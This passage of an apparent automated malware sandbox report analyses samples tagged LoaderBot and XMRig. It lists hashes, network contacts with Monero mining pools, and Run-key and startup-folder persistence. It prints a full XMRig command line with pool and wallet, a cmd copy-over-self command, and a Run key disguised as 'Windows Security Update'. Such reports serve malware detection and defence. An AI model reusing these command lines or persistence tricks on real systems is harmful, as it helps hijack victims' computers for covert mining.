C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Network

Country Destination Domain Proto
US 93.184.221.240:80 tcp
US 93.184.220.29:80 tcp
HN 190.107.133.19:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 20.189.173.7:443 tcp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 13.107.4.50:80 tcp
US 13.107.4.50:80 tcp
US 13.107.4.50:80 tcp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp

Files

memory/4544-132-0x000002419FCB0000-0x000002419FEC6000-memory.dmp

memory/4544-133-0x00007FFFDECD0000-0x00007FFFDF791000-memory.dmp

memory/532-134-0x0000000000000000-mapping.dmp

memory/4544-136-0x00007FFFDECD0000-0x00007FFFDF791000-memory.dmp

memory/4764-135-0x0000000000000000-mapping.dmp

memory/4744-137-0x0000000000000000-mapping.dmp

memory/4664-138-0x0000000000000000-mapping.dmp

memory/3476-139-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe.log

MD5 fff5cbccb6b31b40f834b8f4778a779a
SHA1 899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256 b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA512 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

memory/2436-143-0x0000000140000000-0x0000000140758000-memory.dmp

memory/2436-144-0x00000001402EB66C-mapping.dmp

memory/2436-145-0x0000000140000000-0x0000000140758000-memory.dmp

memory/3476-147-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp

memory/2436-146-0x0000000140000000-0x0000000140758000-memory.dmp

memory/2436-148-0x0000000000A20000-0x0000000000A40000-memory.dmp

memory/2436-149-0x0000000140000000-0x0000000140758000-memory.dmp

memory/3476-150-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp

memory/2436-151-0x0000000140000000-0x0000000140758000-memory.dmp

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

memory/4312-153-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp

memory/4312-154-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win7-20220812-en

Max time kernel

151s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"

Signatures

LoaderBot

loader miner loaderbot

xmrig

miner xmrig

LoaderBot executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Usermode.exe" C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1400 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1400 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1400 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1400 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\Usermode.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1400 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe C:\Windows\SysWOW64\cmd.exe
PID 1980 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1980 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1980 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1980 wrote to memory of 984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 2020 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
PID 1984 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 1984 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 1984 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 1984 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Usermode.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe

"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"

C:\Users\Admin\AppData\Local\Temp\Usermode.exe

"C:\Users\Admin\AppData\Local\Temp\Usermode.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\setup.exe" "C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp" /SL5="$8011E,2411950,352768,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 86VwoTuZTDgF5trS4bcEkvXtoHhUySbTWaWD5K4chXXc6XEPtWSVJcB43EVa9fmhPwcXRDNJ1hY21QqQtH3MQShV1F4VWrX -p x -k -v=0 --donate-level=1 -t 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.195:3333 pool.supportxmr.com tcp

Files

memory/1400-54-0x0000000075571000-0x0000000075573000-memory.dmp

\Users\Admin\AppData\Local\Temp\Usermode.exe

MD5 c08501fa8eca8770f56a14bee65ca31a
SHA1 1631125fef2594684dceed63455c7816c5ce1e46
SHA256 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385
SHA512 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025

memory/1984-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Usermode.exe

MD5 c08501fa8eca8770f56a14bee65ca31a
SHA1 1631125fef2594684dceed63455c7816c5ce1e46
SHA256 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385
SHA512 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025

C:\Users\Admin\AppData\Local\Temp\Usermode.exe

MD5 c08501fa8eca8770f56a14bee65ca31a
SHA1 1631125fef2594684dceed63455c7816c5ce1e46
SHA256 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385
SHA512 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 df0fd86748ba867a58e017bb2311990f
SHA1 d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e
SHA256 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4
SHA512 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb

memory/1984-65-0x00000000009C0000-0x0000000000E70000-memory.dmp

memory/1980-63-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 df0fd86748ba867a58e017bb2311990f
SHA1 d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e
SHA256 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4
SHA512 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 df0fd86748ba867a58e017bb2311990f
SHA1 d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e
SHA256 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4
SHA512 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb

memory/2020-60-0x0000000000000000-mapping.dmp

memory/984-67-0x0000000000000000-mapping.dmp

memory/2020-66-0x0000000000400000-0x0000000000460000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp

MD5 36da68f5c3a7fe4dd3f589941160ac85
SHA1 71c610db1bc62c9af3d23f819433a6cd89432fe8
SHA256 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e
SHA512 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c

memory/564-71-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp

MD5 36da68f5c3a7fe4dd3f589941160ac85
SHA1 71c610db1bc62c9af3d23f819433a6cd89432fe8
SHA256 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e
SHA512 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c

\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\ISDone.dll

MD5 f26684a0b0999413be6751f335603471
SHA1 dcd054328740c4bbf00e11b0b8f00a00f311898d
SHA256 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890
SHA512 d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e

memory/2020-78-0x0000000000400000-0x0000000000460000-memory.dmp

\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 22b86c4bdd3a476351ebe051e2af9564
SHA1 10c9928d20a1e272f58fef1a56434deabae68aa4
SHA256 fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45
SHA512 fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 22b86c4bdd3a476351ebe051e2af9564
SHA1 10c9928d20a1e272f58fef1a56434deabae68aa4
SHA256 fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45
SHA512 fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982

memory/876-80-0x0000000000000000-mapping.dmp

memory/876-82-0x0000000000270000-0x0000000000280000-memory.dmp

memory/1984-83-0x0000000006460000-0x000000000713E000-memory.dmp

memory/876-84-0x0000000140000000-0x0000000140CDE000-memory.dmp

memory/564-87-0x0000000002100000-0x000000000210F000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\b2p.dll

MD5 ab35386487b343e3e82dbd2671ff9dab
SHA1 03591d07aea3309b631a7d3a6e20a92653e199b8
SHA256 c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512 b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

memory/564-88-0x0000000073380000-0x0000000073391000-memory.dmp

memory/876-89-0x0000000000000000-0x0000000001000000-memory.dmp

memory/1984-90-0x0000000006460000-0x000000000713E000-memory.dmp

memory/876-91-0x0000000140000000-0x0000000140CDE000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win10v2004-20220901-en

Max time kernel

152s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4540 set thread context of 2072 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
